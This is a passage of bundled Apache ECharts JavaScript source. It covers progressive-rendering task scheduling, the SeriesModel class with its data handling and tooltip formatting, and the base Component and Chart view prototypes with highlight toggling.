context.data = context.outputData = upTask.context.outputData;\n    }\n\n    if (this.__pipeline) {\n        this.__pipeline.currentTask = this;\n    }\n\n    var planResult;\n    if (this._plan && !skip) {\n        planResult = this._plan(this.context);\n    }\n\n    // Support sharding by mod, which changes the render sequence and makes the rendered graphic\n    // elements uniformed distributed when progress, especially when moving or zooming.\n    var lastModBy = normalizeModBy(this._modBy);\n    var lastModDataCount = this._modDataCount || 0;\n    var modBy = normalizeModBy(performArgs && performArgs.modBy);\n    var modDataCount = performArgs && performArgs.modDataCount || 0;\n    if (lastModBy !== modBy || lastModDataCount !== modDataCount) {\n        planResult = 'reset';\n    }\n\n    function normalizeModBy(val) {\n        !(val >= 1) && (val = 1); // jshint ignore:line\n        return val;\n    }\n\n    var forceFirstProgress;\n    if (this._dirty || planResult === 'reset') {\n        this._dirty = false;\n        forceFirstProgress = reset(this, skip);\n    }\n\n    this._modBy = modBy;\n    this._modDataCount = modDataCount;\n\n    var step = performArgs && performArgs.step;\n\n    if (upTask) {\n\n        if (__DEV__) {\n            assert$1(upTask._outputDueEnd != null);\n        }\n        this._dueEnd = upTask._outputDueEnd;\n    }\n    // DataTask or overallTask\n    else {\n        if (__DEV__) {\n            assert$1(!this._progress || this._count);\n        }\n        this._dueEnd = this._count ? this._count(this.context) : Infinity;\n    }\n\n    // Note: Stubs, that its host overall task let it has progress, has progress.\n    // If no progress, pass index from upstream to downstream each time plan called.\n    if (this._progress) {\n        var start = this._dueIndex;\n        var end = Math.min(\n            step != null ? this._dueIndex + step : Infinity,\n            this._dueEnd\n        );\n\n        if (!skip && (forceFirstProgress || start < end)) {\n            var progress = this._progress;\n            if (isArray(progress)) {\n                for (var i = 0; i < progress.length; i++) {\n                    doProgress(this, progress[i], start, end, modBy, modDataCount);\n                }\n            }\n            else {\n                doProgress(this, progress, start, end, modBy, modDataCount);\n            }\n        }\n\n        this._dueIndex = end;\n        // If no `outputDueEnd`, assume that output data and\n        // input data is the same, so use `dueIndex` as `outputDueEnd`.\n        var outputDueEnd = this._settedOutputEnd != null\n            ? this._settedOutputEnd : end;\n\n        if (__DEV__) {\n            // ??? Can not rollback.\n            assert$1(outputDueEnd >= this._outputDueEnd);\n        }\n\n        this._outputDueEnd = outputDueEnd;\n    }\n    else {\n        // (1) Some overall task has no progress.\n        // (2) Stubs, that its host overall task do not let it has progress, has no progress.\n        // This should always be performed so it can be passed to downstream.\n        this._dueIndex = this._outputDueEnd = this._settedOutputEnd != null\n            ? this._settedOutputEnd : this._dueEnd;\n    }\n\n    return this.unfinished();\n};\n\nvar iterator = (function () {\n\n    var end;\n    var current;\n    var modBy;\n    var modDataCount;\n    var winCount;\n\n    var it = {\n        reset: function (s, e, sStep, sCount) {\n            current = s;\n            end = e;\n\n            modBy = sStep;\n            modDataCount = sCount;\n            winCount = Math.ceil(modDataCount / modBy);\n\n            it.next = (modBy > 1 && modDataCount > 0) ? modNext : sequentialNext;\n        }\n    };\n\n    return it;\n\n    function sequentialNext() {\n        return current < end ? current++ : null;\n    }\n\n    function modNext() {\n        var dataIndex = (current % winCount) * modBy + Math.ceil(current / winCount);\n        var result = current >= end\n            ? null\n            : dataIndex < modDataCount\n            ? dataIndex\n            // If modDataCount is smaller than data.count() (consider `appendData` case),\n            // Use normal linear rendering mode.\n            : current;\n        current++;\n        return result;\n    }\n})();\n\ntaskProto.dirty = function () {\n    this._dirty = true;\n    this._onDirty && this._onDirty(this.context);\n};\n\nfunction doProgress(taskIns, progress, start, end, modBy, modDataCount) {\n    iterator.reset(start, end, modBy, modDataCount);\n    taskIns._callingProgress = progress;\n    taskIns._callingProgress({\n        start: start, end: end, count: end - start, next: iterator.next\n    }, taskIns.context);\n}\n\nfunction reset(taskIns, skip) {\n    taskIns._dueIndex = taskIns._outputDueEnd = taskIns._dueEnd = 0;\n    taskIns._settedOutputEnd = null;\n\n    var progress;\n    var forceFirstProgress;\n\n    if (!skip && taskIns._reset) {\n        progress = taskIns._reset(taskIns.context);\n        if (progress && progress.progress) {\n            forceFirstProgress = progress.forceFirstProgress;\n            progress = progress.progress;\n        }\n        // To simplify no progress checking, array must has item.\n        if (isArray(progress) && !progress.length) {\n            progress = null;\n        }\n    }\n\n    taskIns._progress = progress;\n    taskIns._modBy = taskIns._modDataCount = null;\n\n    var downstream = taskIns._downstream;\n    downstream && downstream.dirty();\n\n    return forceFirstProgress;\n}\n\n/**\n * @return {boolean}\n */\ntaskProto.unfinished = function () {\n    return this._progress && this._dueIndex < this._dueEnd;\n};\n\n/**\n * @param {Object} downTask The downstream task.\n * @return {Object} The downstream task.\n */\ntaskProto.pipe = function (downTask) {\n    if (__DEV__) {\n        assert$1(downTask && !downTask._disposed && downTask !== this);\n    }\n\n    // If already downstream, do not dirty downTask.\n    if (this._downstream !== downTask || this._dirty) {\n        this._downstream = downTask;\n        downTask._upstream = this;\n        downTask.dirty();\n    }\n};\n\ntaskProto.dispose = function () {\n    if (this._disposed) {\n        return;\n    }\n\n    this._upstream && (this._upstream._downstream = null);\n    this._downstream && (this._downstream._upstream = null);\n\n    this._dirty = false;\n    this._disposed = true;\n};\n\ntaskProto.getUpstream = function () {\n    return this._upstream;\n};\n\ntaskProto.getDownstream = function () {\n    return this._downstream;\n};\n\ntaskProto.setOutputEnd = function (end) {\n    // This only happend in dataTask, dataZoom, map, currently.\n    // where dataZoom do not set end each time, but only set\n    // when reset. So we should record the setted end, in case\n    // that the stub of dataZoom perform again and earse the\n    // setted end by upstream.\n    this._outputDueEnd = this._settedOutputEnd = end;\n};\n\n\n///////////////////////////////////////////////////////////\n// For stream debug (Should be commented out after used!)\n// Usage: printTask(this, 'begin');\n// Usage: printTask(this, null, {someExtraProp});\n// function printTask(task, prefix, extra) {\n//     window.ecTaskUID == null && (window.ecTaskUID = 0);\n//     task.uidDebug == null && (task.uidDebug = `task_${window.ecTaskUID++}`);\n//     task.agent && task.agent.uidDebug == null && (task.agent.uidDebug = `task_${window.ecTaskUID++}`);\n//     var props = [];\n//     if (task.__pipeline) {\n//         var val = `${task.__idxInPipeline}/${task.__pipeline.tail.__idxInPipeline} ${task.agent ? '(stub)' : ''}`;\n//         props.push({text: 'idx', value: val});\n//     } else {\n//         var stubCount = 0;\n//         task.agentStubMap.each(() => stubCount++);\n//         props.push({text: 'idx', value: `overall (stubs: ${stubCount})`});\n//     }\n//     props.push({text: 'uid', value: task.uidDebug});\n//     if (task.__pipeline) {\n//         props.push({text: 'pid', value: task.__pipeline.id});\n//         task.agent && props.push(\n//             {text: 'stubFor', value: task.agent.uidDebug}\n//         );\n//     }\n//     props.push(\n//         {text: 'dirty', value: task._dirty},\n//         {text: 'dueIndex', value: task._dueIndex},\n//         {text: 'dueEnd', value: task._dueEnd},\n//         {text: 'outputDueEnd', value: task._outputDueEnd}\n//     );\n//     if (extra) {\n//         Object.keys(extra).forEach(key => {\n//             props.push({text: key, value: extra[key]});\n//         });\n//     }\n//     var args = ['color: blue'];\n//     var msg = `%c[${prefix || 'T'}] %c` + props.map(item => (\n//         args.push('color: black', 'color: red'),\n//         `${item.text}: %c${item.value}`\n//     )).join('%c, ');\n//     console.log.apply(console, [msg].concat(args));\n//     // console.log(this);\n// }\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar inner$4 = makeInner();\n\nvar SeriesModel = ComponentModel.extend({\n\n    type: 'series.__base__',\n\n    /**\n     * @readOnly\n     */\n    seriesIndex: 0,\n\n    // coodinateSystem will be injected in the echarts/CoordinateSystem\n    coordinateSystem: null,\n\n    /**\n     * @type {Object}\n     * @protected\n     */\n    defaultOption: null,\n\n    /**\n     * legend visual provider to the legend component\n     * @type {Object}\n     */\n    // PENDING\n    legendVisualProvider: null,\n\n    /**\n     * Access path of color for visual\n     */\n    visualColorAccessPath: 'itemStyle.color',\n\n    /**\n     * Access path of borderColor for visual\n     */\n    visualBorderColorAccessPath: 'itemStyle.borderColor',\n\n    /**\n     * Support merge layout params.\n     * Only support 'box' now (left/right/top/bottom/width/height).\n     * @type {string|Object} Object can be {ignoreSize: true}\n     * @readOnly\n     */\n    layoutMode: null,\n\n    init: function (option, parentModel, ecModel, extraOpt) {\n\n        /**\n         * @type {number}\n         * @readOnly\n         */\n        this.seriesIndex = this.componentIndex;\n\n        this.dataTask = createTask({\n            count: dataTaskCount,\n            reset: dataTaskReset\n        });\n        this.dataTask.context = {model: this};\n\n        this.mergeDefaultAndTheme(option, ecModel);\n\n        prepareSource(this);\n\n\n        var data = this.getInitialData(option, ecModel);\n        wrapData(data, this);\n        this.dataTask.context.data = data;\n\n        if (__DEV__) {\n            assert$1(data, 'getInitialData returned invalid data.');\n        }\n\n        /**\n         * @type {module:echarts/data/List|module:echarts/data/Tree|module:echarts/data/Graph}\n         * @private\n         */\n        inner$4(this).dataBeforeProcessed = data;\n\n        // If we reverse the order (make data firstly, and then make\n        // dataBeforeProcessed by cloneShallow), cloneShallow will\n        // cause data.graph.data !== data when using\n        // module:echarts/data/Graph or module:echarts/data/Tree.\n        // See module:echarts/data/helper/linkList\n\n        // Theoretically, it is unreasonable to call `seriesModel.getData()` in the model\n        // init or merge stage, because the data can be restored. So we do not `restoreData`\n        // and `setData` here, which forbids calling `seriesModel.getData()` in this stage.\n        // Call `seriesModel.getRawData()` instead.\n        // this.restoreData();\n\n        autoSeriesName(this);\n    },\n\n    /**\n     * Util for merge default and theme to option\n     * @param  {Object} option\n     * @param  {module:echarts/model/Global} ecModel\n     */\n    mergeDefaultAndTheme: function (option, ecModel) {\n        var layoutMode = this.layoutMode;\n        var inputPositionParams = layoutMode\n            ? getLayoutParams(option) : {};\n\n        // Backward compat: using subType on theme.\n        // But if name duplicate between series subType\n        // (for example: parallel) add component mainType,\n        // add suffix 'Series'.\n        var themeSubType = this.subType;\n        if (ComponentModel.hasClass(themeSubType)) {\n            themeSubType += 'Series';\n        }\n        merge(\n            option,\n            ecModel.getTheme().get(this.subType)\n        );\n        merge(option, this.getDefaultOption());\n\n        // Default label emphasis `show`\n        defaultEmphasis(option, 'label', ['show']);\n\n        this.fillDataTextStyle(option.data);\n\n        if (layoutMode) {\n            mergeLayoutParam(option, inputPositionParams, layoutMode);\n        }\n    },\n\n    mergeOption: function (newSeriesOption, ecModel) {\n        // this.settingTask.dirty();\n\n        newSeriesOption = merge(this.option, newSeriesOption, true);\n        this.fillDataTextStyle(newSeriesOption.data);\n\n        var layoutMode = this.layoutMode;\n        if (layoutMode) {\n            mergeLayoutParam(this.option, newSeriesOption, layoutMode);\n        }\n\n        prepareSource(this);\n\n        var data = this.getInitialData(newSeriesOption, ecModel);\n        wrapData(data, this);\n        this.dataTask.dirty();\n        this.dataTask.context.data = data;\n\n        inner$4(this).dataBeforeProcessed = data;\n\n        autoSeriesName(this);\n    },\n\n    fillDataTextStyle: function (data) {\n        // Default data label emphasis `show`\n        // FIXME Tree structure data ?\n        // FIXME Performance ?\n        if (data && !isTypedArray(data)) {\n            var props = ['show'];\n            for (var i = 0; i < data.length; i++) {\n                if (data[i] && data[i].label) {\n                    defaultEmphasis(data[i], 'label', props);\n                }\n            }\n        }\n    },\n\n    /**\n     * Init a data structure from data related option in series\n     * Must be overwritten\n     */\n    getInitialData: function () {},\n\n    /**\n     * Append data to list\n     * @param {Object} params\n     * @param {Array|TypedArray} params.data\n     */\n    appendData: function (params) {\n        // FIXME ???\n        // (1) If data from dataset, forbidden append.\n        // (2) support append data of dataset.\n        var data = this.getRawData();\n        data.appendData(params.data);\n    },\n\n    /**\n     * Consider some method like `filter`, `map` need make new data,\n     * We should make sure that `seriesModel.getData()` get correct\n     * data in the stream procedure. So we fetch data from upstream\n     * each time `task.perform` called.\n     * @param {string} [dataType]\n     * @return {module:echarts/data/List}\n     */\n    getData: function (dataType) {\n        var task = getCurrentTask(this);\n        if (task) {\n            var data = task.context.data;\n            return dataType == null ? data : data.getLinkedData(dataType);\n        }\n        else {\n            // When series is not alive (that may happen when click toolbox\n            // restore or setOption with not merge mode), series data may\n            // be still need to judge animation or something when graphic\n            // elements want to know whether fade out.\n            return inner$4(this).data;\n        }\n    },\n\n    /**\n     * @param {module:echarts/data/List} data\n     */\n    setData: function (data) {\n        var task = getCurrentTask(this);\n        if (task) {\n            var context = task.context;\n            // Consider case: filter, data sample.\n            if (context.data !== data && task.modifyOutputEnd) {\n                task.setOutputEnd(data.count());\n            }\n            context.outputData = data;\n            // Caution: setData should update context.data,\n            // Because getData may be called multiply in a\n            // single stage and expect to get the data just\n            // set. (For example, AxisProxy, x y both call\n            // getData and setDate sequentially).\n            // So the context.data should be fetched from\n            // upstream each time when a stage starts to be\n            // performed.\n            if (task !== this.dataTask) {\n                context.data = data;\n            }\n        }\n        inner$4(this).data = data;\n    },\n\n    /**\n     * @see {module:echarts/data/helper/sourceHelper#getSource}\n     * @return {module:echarts/data/Source} source\n     */\n    getSource: function () {\n        return getSource(this);\n    },\n\n    /**\n     * Get data before processed\n     * @return {module:echarts/data/List}\n     */\n    getRawData: function () {\n        return inner$4(this).dataBeforeProcessed;\n    },\n\n    /**\n     * Get base axis if has coordinate system and has axis.\n     * By default use coordSys.getBaseAxis();\n     * Can be overrided for some chart.\n     * @return {type} description\n     */\n    getBaseAxis: function () {\n        var coordSys = this.coordinateSystem;\n        return coordSys && coordSys.getBaseAxis && coordSys.getBaseAxis();\n    },\n\n    // FIXME\n    /**\n     * Default tooltip formatter\n     *\n     * @param {number} dataIndex\n     * @param {boolean} [multipleSeries=false]\n     * @param {number} [dataType]\n     * @param {string} [renderMode='html'] valid values: 'html' and 'richText'.\n     *                                     'html' is used for rendering tooltip in extra DOM form, and the result\n     *                                     string is used as DOM HTML content.\n     *                                     'richText' is used for rendering tooltip in rich text form, for those where\n     *                                     DOM operation is not supported.\n     * @return {Object} formatted tooltip with `html` and `markers`\n     */\n    formatTooltip: function (dataIndex, multipleSeries, dataType, renderMode) {\n\n        var series = this;\n        renderMode = renderMode || 'html';\n        var newLine = renderMode === 'html' ? '<br/>' : '\\n';\n        var isRichText = renderMode === 'richText';\n        var markers = {};\n        var markerId = 0;\n\n        function formatArrayValue(value) {\n            // ??? TODO refactor these logic.\n            // check: category-no-encode-has-axis-data in dataset.html\n            var vertially = reduce(value, function (vertially, val, idx) {\n                var dimItem = data.getDimensionInfo(idx);\n                return vertially |= dimItem && dimItem.tooltip !== false && dimItem.displayName != null;\n            }, 0);\n\n            var result = [];\n\n            tooltipDims.length\n                ? each$1(tooltipDims, function (dim) {\n                    setEachItem(retrieveRawValue(data, dataIndex, dim), dim);\n                })\n                // By default, all dims is used on tooltip.\n                : each$1(value, setEachItem);\n\n            function setEachItem(val, dim) {\n                var dimInfo = data.getDimensionInfo(dim);\n                // If `dimInfo.tooltip` is not set, show tooltip.\n                if (!dimInfo || dimInfo.otherDims.tooltip === false) {\n                    return;\n                }\n                var dimType = dimInfo.type;\n                var markName = 'sub' + series.seriesIndex + 'at' + markerId;\n                var dimHead = getTooltipMarker({\n                    color: color,\n                    type: 'subItem',\n                    renderMode: renderMode,\n                    markerId: markName\n                });\n\n                var dimHeadStr = typeof dimHead === 'string' ? dimHead : dimHead.content;\n                var valStr = (vertially\n                        ? dimHeadStr + encodeHTML(dimInfo.displayName || '-') + ': '\n                        : ''\n                    )\n                    // FIXME should not format time for raw data?\n                    + encodeHTML(dimType === 'ordinal'\n                        ? val + ''\n                        : dimType === 'time'\n                        ? (multipleSeries ? '' : formatTime('yyyy/MM/dd hh:mm:ss', val))\n                        : addCommas(val)\n                    );\n                valStr && result.push(valStr);\n\n                if (isRichText) {\n                    markers[markName] = color;\n                    ++markerId;\n                }\n            }\n\n            var newLine = vertially ? (isRichText ? '\\n' : '<br/>') : '';\n            var content = newLine + result.join(newLine || ', ');\n            return {\n                renderMode: renderMode,\n                content: content,\n                style: markers\n            };\n        }\n\n        function formatSingleValue(val) {\n            // return encodeHTML(addCommas(val));\n            return {\n                renderMode: renderMode,\n                content: encodeHTML(addCommas(val)),\n                style: markers\n            };\n        }\n\n        var data = this.getData();\n        var tooltipDims = data.mapDimension('defaultedTooltip', true);\n        var tooltipDimLen = tooltipDims.length;\n        var value = this.getRawValue(dataIndex);\n        var isValueArr = isArray(value);\n\n        var color = data.getItemVisual(dataIndex, 'color');\n        if (isObject$1(color) && color.colorStops) {\n            color = (color.colorStops[0] || {}).color;\n        }\n        color = color || 'transparent';\n\n        // Complicated rule for pretty tooltip.\n        var formattedValue = (tooltipDimLen > 1 || (isValueArr && !tooltipDimLen))\n            ? formatArrayValue(value)\n            : tooltipDimLen\n            ? formatSingleValue(retrieveRawValue(data, dataIndex, tooltipDims[0]))\n            : formatSingleValue(isValueArr ? value[0] : value);\n        var content = formattedValue.content;\n\n        var markName = series.seriesIndex + 'at' + markerId;\n        var colorEl = getTooltipMarker({\n            color: color,\n            type: 'item',\n            renderMode: renderMode,\n            markerId: markName\n        });\n        markers[markName] = color;\n        ++markerId;\n\n        var name = data.getName(dataIndex);\n\n        var seriesName = this.name;\n        if (!isNameSpecified(this)) {\n            seriesName = '';\n        }\n        seriesName = seriesName\n            ? encodeHTML(seriesName) + (!multipleSeries ? newLine : ': ')\n            : '';\n\n        var colorStr = typeof colorEl === 'string' ? colorEl : colorEl.content;\n        var html = !multipleSeries\n            ? seriesName + colorStr\n                + (name\n                    ? encodeHTML(name) + ': ' + content\n                    : content\n                )\n            : colorStr + seriesName + content;\n\n        return {\n            html: html,\n            markers: markers\n        };\n    },\n\n    /**\n     * @return {boolean}\n     */\n    isAnimationEnabled: function () {\n        if (env$1.node) {\n            return false;\n        }\n\n        var animationEnabled = this.getShallow('animation');\n        if (animationEnabled) {\n            if (this.getData().count() > this.getShallow('animationThreshold')) {\n                animationEnabled = false;\n            }\n        }\n        return animationEnabled;\n    },\n\n    restoreData: function () {\n        this.dataTask.dirty();\n    },\n\n    getColorFromPalette: function (name, scope, requestColorNum) {\n        var ecModel = this.ecModel;\n        // PENDING\n        var color = colorPaletteMixin.getColorFromPalette.call(this, name, scope, requestColorNum);\n        if (!color) {\n            color = ecModel.getColorFromPalette(name, scope, requestColorNum);\n        }\n        return color;\n    },\n\n    /**\n     * Use `data.mapDimension(coordDim, true)` instead.\n     * @deprecated\n     */\n    coordDimToDataDim: function (coordDim) {\n        return this.getRawData().mapDimension(coordDim, true);\n    },\n\n    /**\n     * Get progressive rendering count each step\n     * @return {number}\n     */\n    getProgressive: function () {\n        return this.get('progressive');\n    },\n\n    /**\n     * Get progressive rendering count each step\n     * @return {number}\n     */\n    getProgressiveThreshold: function () {\n        return this.get('progressiveThreshold');\n    },\n\n    /**\n     * Get data indices for show tooltip content. See tooltip.\n     * @abstract\n     * @param {Array.<string>|string} dim\n     * @param {Array.<number>} value\n     * @param {module:echarts/coord/single/SingleAxis} baseAxis\n     * @return {Object} {dataIndices, nestestValue}.\n     */\n    getAxisTooltipData: null,\n\n    /**\n     * See tooltip.\n     * @abstract\n     * @param {number} dataIndex\n     * @return {Array.<number>} Point of tooltip. null/undefined can be returned.\n     */\n    getTooltipPosition: null,\n\n    /**\n     * @see {module:echarts/stream/Scheduler}\n     */\n    pipeTask: null,\n\n    /**\n     * Convinient for override in extended class.\n     * @protected\n     * @type {Function}\n     */\n    preventIncremental: null,\n\n    /**\n     * @public\n     * @readOnly\n     * @type {Object}\n     */\n    pipelineContext: null\n\n});\n\n\nmixin(SeriesModel, dataFormatMixin);\nmixin(SeriesModel, colorPaletteMixin);\n\n/**\n * MUST be called after `prepareSource` called\n * Here we need to make auto series, especially for auto legend. But we\n * do not modify series.name in option to avoid side effects.\n */\nfunction autoSeriesName(seriesModel) {\n    // User specified name has higher priority, otherwise it may cause\n    // series can not be queried unexpectedly.\n    var name = seriesModel.name;\n    if (!isNameSpecified(seriesModel)) {\n        seriesModel.name = getSeriesAutoName(seriesModel) || name;\n    }\n}\n\nfunction getSeriesAutoName(seriesModel) {\n    var data = seriesModel.getRawData();\n    var dataDims = data.mapDimension('seriesName', true);\n    var nameArr = [];\n    each$1(dataDims, function (dataDim) {\n        var dimInfo = data.getDimensionInfo(dataDim);\n        dimInfo.displayName && nameArr.push(dimInfo.displayName);\n    });\n    return nameArr.join(' ');\n}\n\nfunction dataTaskCount(context) {\n    return context.model.getRawData().count();\n}\n\nfunction dataTaskReset(context) {\n    var seriesModel = context.model;\n    seriesModel.setData(seriesModel.getRawData().cloneShallow());\n    return dataTaskProgress;\n}\n\nfunction dataTaskProgress(param, context) {\n    // Avoid repead cloneShallow when data just created in reset.\n    if (param.end > context.outputData.count()) {\n        context.model.getRawData().cloneShallow(context.outputData);\n    }\n}\n\n// TODO refactor\nfunction wrapData(data, seriesModel) {\n    each$1(data.CHANGABLE_METHODS, function (methodName) {\n        data.wrapMethod(methodName, curry(onDataSelfChange, seriesModel));\n    });\n}\n\nfunction onDataSelfChange(seriesModel) {\n    var task = getCurrentTask(seriesModel);\n    if (task) {\n        // Consider case: filter, selectRange\n        task.setOutputEnd(this.count());\n    }\n}\n\nfunction getCurrentTask(seriesModel) {\n    var scheduler = (seriesModel.ecModel || {}).scheduler;\n    var pipeline = scheduler && scheduler.getPipeline(seriesModel.uid);\n\n    if (pipeline) {\n        // When pipline finished, the currrentTask keep the last\n        // task (renderTask).\n        var task = pipeline.currentTask;\n        if (task) {\n            var agentStubMap = task.agentStubMap;\n            if (agentStubMap) {\n                task = agentStubMap.get(seriesModel.uid);\n            }\n        }\n        return task;\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar Component$1 = function () {\n    /**\n     * @type {module:zrender/container/Group}\n     * @readOnly\n     */\n    this.group = new Group();\n\n    /**\n     * @type {string}\n     * @readOnly\n     */\n    this.uid = getUID('viewComponent');\n};\n\nComponent$1.prototype = {\n\n    constructor: Component$1,\n\n    init: function (ecModel, api) {},\n\n    render: function (componentModel, ecModel, api, payload) {},\n\n    dispose: function () {},\n\n    /**\n     * @param {string} eventType\n     * @param {Object} query\n     * @param {module:zrender/Element} targetEl\n     * @param {Object} packedEvent\n     * @return {boolen} Pass only when return `true`.\n     */\n    filterForExposedEvent: null\n\n};\n\nvar componentProto = Component$1.prototype;\ncomponentProto.updateView =\n    componentProto.updateLayout =\n    componentProto.updateVisual =\n    function (seriesModel, ecModel, api, payload) {\n        // Do nothing;\n    };\n// Enable Component.extend.\nenableClassExtend(Component$1);\n\n// Enable capability of registerClass, getClass, hasClass, registerSubTypeDefaulter and so on.\nenableClassManagement(Component$1, {registerWhenExtend: true});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @return {string} If large mode changed, return string 'reset';\n */\nvar createRenderPlanner = function () {\n    var inner = makeInner();\n\n    return function (seriesModel) {\n        var fields = inner(seriesModel);\n        var pipelineContext = seriesModel.pipelineContext;\n\n        var originalLarge = fields.large;\n        var originalProgressive = fields.progressiveRender;\n\n        // FIXME: if the planner works on a filtered series, `pipelineContext` does not\n        // exists. See #11611 . Probably we need to modify this structure, see the comment\n        // on `performRawSeries` in `Schedular.js`.\n        var large = fields.large = pipelineContext && pipelineContext.large;\n        var progressive = fields.progressiveRender = pipelineContext && pipelineContext.progressiveRender;\n\n        return !!((originalLarge ^ large) || (originalProgressive ^ progressive)) && 'reset';\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar inner$5 = makeInner();\nvar renderPlanner = createRenderPlanner();\n\nfunction Chart() {\n\n    /**\n     * @type {module:zrender/container/Group}\n     * @readOnly\n     */\n    this.group = new Group();\n\n    /**\n     * @type {string}\n     * @readOnly\n     */\n    this.uid = getUID('viewChart');\n\n    this.renderTask = createTask({\n        plan: renderTaskPlan,\n        reset: renderTaskReset\n    });\n    this.renderTask.context = {view: this};\n}\n\nChart.prototype = {\n\n    type: 'chart',\n\n    /**\n     * Init the chart.\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     */\n    init: function (ecModel, api) {},\n\n    /**\n     * Render the chart.\n     * @param  {module:echarts/model/Series} seriesModel\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     * @param  {Object} payload\n     */\n    render: function (seriesModel, ecModel, api, payload) {},\n\n    /**\n     * Highlight series or specified data item.\n     * @param  {module:echarts/model/Series} seriesModel\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     * @param  {Object} payload\n     */\n    highlight: function (seriesModel, ecModel, api, payload) {\n        toggleHighlight(seriesModel.getData(), payload, 'emphasis');\n    },\n\n    /**\n     * Downplay series or specified data item.\n     * @param  {module:echarts/model/Series} seriesModel\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     * @param  {Object} payload\n     */\n    downplay: function (seriesModel, ecModel, api, payload) {\n        toggleHighlight(seriesModel.getData(), payload, 'normal');\n    },\n\n    /**\n     * Remove self.\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     */\n    remove: function (ecModel, api) {\n        this.group.removeAll();\n    },\n\n    /**\n     * Dispose self.\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     */\n    dispose: function () {},\n\n    /**\n     * Rendering preparation in progressive mode.\n     * @param  {module:echarts/model/Series} seriesModel\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     * @param  {Object} payload\n     */\n    incrementalPrepareRender: null,\n\n    /**\n     * Render in progressive mode.\n     * @param  {Object} params See taskParams in `stream/task.js`\n     * @param  {module:echarts/model/Series} seriesModel\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     * @param  {Object} payload\n     */\n    incrementalRender: null,\n\n    /**\n     * Update transform directly.\n     * @param  {module:echarts/model/Series} seriesModel\n     * @param  {module:echarts/model/Global} ecModel\n     * @param  {module:echarts/ExtensionAPI} api\n     * @param  {Object} payload\n     * @return {Object} {update: true}\n     */\n    updateTransform: null,\n\n    /**\n     * The view contains the given point.\n     * @interface\n     * @param {Array.<number>} point\n     * @return {boolean}\n     */\n    // containPoint: function () {}\n\n    /**\n     * @param {string} eventType\n     * @param {Object} query\n     * @param {module:zrender/Element} targetEl\n     * @param {Object} packedEvent\n     * @return {boolen} Pass only when return `true`.\n     */\n    filterForExposedEvent: null\n\n};\n\nvar chartProto = Chart.prototype;\nchartProto.updateView =\nchartProto.updateLayout =\nchartProto.updateVisual =\n    function (seriesModel, ecModel, api, payload) {\n        this.render(seriesModel, ecModel, api, payload);\n    };\n\n/**\n * Set state of single element\n * @param {module:zrender/Element} el\n * @param {string} state 'normal'|'emphasis'\n * @param {number} highlightDigit\n */\nfunction elSetState(el, state, highlightDigit) {\n    if (el) {\n        el.trigger(state, highlightDigit);\n        if (el.isGroup\n            // Simple optimize.\n            && !isHighDownDispatcher(el)\n        ) {\n            for (var i = 0, len = el.childCount(); i < len; i++) {\n                elSetState(el.childAt(i), state, highlightDigit);\n            }\n        }\n    }\n}\n\n/**\n * @param {module:echarts/data/List} data\n * @param {Object} payload\n * @param {string} state 'normal'|'emphasis'\n */\nfunction toggleHighlight(data, payload, state) {\n    var dataIndex = queryDataIndex(data, payload);\n\n    var highlightDigit = (payload && payload.highlightKey != null)\n        ? getHighlightDigit(payload.highlightKey)\n        : null;\n\n    if (dataIndex != null) {\n        each$1(normalizeToArray(dataIndex), function (dataIdx) {\n            elSetState(data.getItemGraphicEl(dataIdx), state, highlightDigit);\n        });\n    }\n    else {\n        